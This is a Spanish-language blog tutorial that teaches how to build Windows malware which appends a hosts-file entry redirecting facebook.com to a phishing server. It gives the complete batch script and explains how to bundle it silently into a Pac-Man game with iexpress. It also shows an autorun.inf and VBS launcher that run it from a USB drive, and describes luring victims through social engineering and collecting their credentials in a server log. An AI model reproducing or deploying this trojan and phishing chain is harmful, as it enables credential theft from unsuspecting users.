DNS Spoofing Malware
Bueno en este Tutorial Vamos a ver como realizar un DnsSpoof
atraves del Malware, Modificando el archivo Hosts, y redireccionando
una web a la ip que nosotros deseemos, veremos tambien como ejecutar
este malware desde un una Memoria Flash
El ataque DnsSpoof en el q nos basaremos sera el que modifica el archivo hosts
para eso crearemos un Malware q constara de 2 archivos en un caso y 4 en otro
Primer Caso:
Ingenieria Social.
Crearemos un malware q constara de 2 archivos
un batch q tendra el siguiente codigo (se guardara con la extencion .bat)
@echo off
echo "IP a la q sera redireccionado" "Sitio que redireccionaremos" >> %SystemRoot%\System32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit
En mi caso direccionare facebook.com a un sitio Fake (Phishing)
DNSSPOOF.bat:
echo 190.169.22.51 facebook.com >> %SystemRoot%\system32\drivers\etc\hosts
taskkill /f /IM explorer.exe
explorer.exe
exit
Ahora Uniremos este Archivo con por Ejempo un juego portable de bajo peso,
yo elegi Packman.
Para realizar este proceso utilizaremos iexpress:
(No explicare como Funciona ahi mucha Info en Internet)
Agregamos los 2 Archivos:
aca la parte importante.
Install Program: Pondremos Packman.exe
Post Intall Command: Pondremos DNSSPOOF.bat
En Show Windows ponemos Hidden
En Packege Name and Options marcamos la Opcion Hide file Extracting Progress Animation from User
y lo Guardamos con el Nombre Packman2.exe
En Configure Restart ponemos NO RESTART
Esperamos q Termine la Comprecion
Cambiamos el Icono con ResHacker al q creamos combeniente (en este ejemplo no cambiare el icono)
Ahora ejecutamos para la prueba:
vemos que el juego se ejecuta correctamente, vamos al archivo hosts para ver si funciono.
borramos esta ultima linea porq obviamente nosotros no queremos ser las victimas :)
Ahora no queda mas q usar algo de Ingenieria Social para q la victima Descarge el Archivo y lo ejecute.
Segundo caso:
Ejecutando Archivo desde un PenDrive:
crearemos un archivo autorun.inf que contenga:
[autorun]
action=Open Files On Folder
icon=USB.ico
shellexecute=Start.vbs
y un Start.vbs que contenga:
set objshell = createobject("wscript.shell")
objshell.run "DNSSPOOF.bat",vbhide
Colocamos DNSSPOOF.bat, Start.vbs, algun .ico q nos guste y el autorun.inf en el PenDrive
Listo Ahora al Conectar el PenDrive Automaticamente se Ejecutara Start.vbs, q a su ves Ejectura DNSSPOOF.bat y cambiara el archivo hosts
Veamos como funciona:
Visitamos facebook.com luego de ejecutar el Malware en la PC Victima (ya sea por cualquiera de los 2 Casos)
y vemos q nos manda a www.facebook.com (que realmente es un sitio Phishing)
Agregamos de Informacion User: pepe@hotmail.com pass: Owned
y le damos Entrar, nos redirecciona a www.facebook.com (sitio real de facebook)
vamos a nuestro servidor y revisamos el archivo log.txt
Espero Que Este Tutorial les sea de Ayuda, no me hago responsable por el uso que le puedan dar HD_Breaker
0 comentarios:
Publicar un comentario